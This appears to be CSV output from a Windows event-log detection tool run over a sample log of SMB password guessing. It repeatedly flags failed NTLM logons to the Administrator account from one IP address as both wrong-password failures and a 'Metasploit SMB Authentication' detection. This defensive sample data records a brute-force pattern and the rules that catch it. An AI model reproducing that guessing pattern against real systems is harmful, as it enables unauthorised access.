Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aDdgwvb1zsZF79k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQUb6CnMUtyrMNhF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP5OxHPsbLHnIUBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ysg903vYFhQHYvFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IySarHtsTvwSP56H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnUy8tbCIAVnmhDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bfBtc4MnMtPG6MpC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37b8MGIHY8QwXf9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDuaWikplDmJNmIE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kSSoAYJILHCPI7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9ikrtTGcZYU1556 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ypyd6SagvUXQHhtZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWS37lIJ3Q6ghgMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H211KmFImpBRwTGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64tO5iBehXQcNc49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xvxDngRj3j5TAwST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8VYRjMnxDgUTWYf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhWphTesbUf0hwi1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MO8VRRVANxIkDzEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ziSXANiDAf7LRFz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g0CvYYtyEcU2riBX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPg2LKgWMeM0Oqo0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbzL9T2d4RdeCz4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PeEfbWpoipfYtOKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RKJW1vSrIAbRTzyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aU4G8NBru22Vc4Cl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sacBcqxV97FUihrd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 41Ms0lEMeT0jYxYj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkQWVEHGM1NxowR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qKqRY7L2IQRoU57 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMIkvwbvqc9V6CFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PehzjCnK42ZPUE7e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fqw2GWiYfO0kU83 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFPJJNCFdPJl4igl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zc6CrAr7YoozKB6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHXminAIeV4ZJIK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06YmUCHNZqbaZMdZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fYoENCtP2uPy9xNh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TRJRuXJTTH1afAfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpnkzTlc3Uvj3hpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIuD8haFzR8P87rL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL1IreMAiE564NXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMUiCaMGBC46MnPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MOSWbwooyb60LExG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSDNF7s3vbtkZIOz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JBMk0qOV6237XtK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j41R1U1tYPvApCkZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 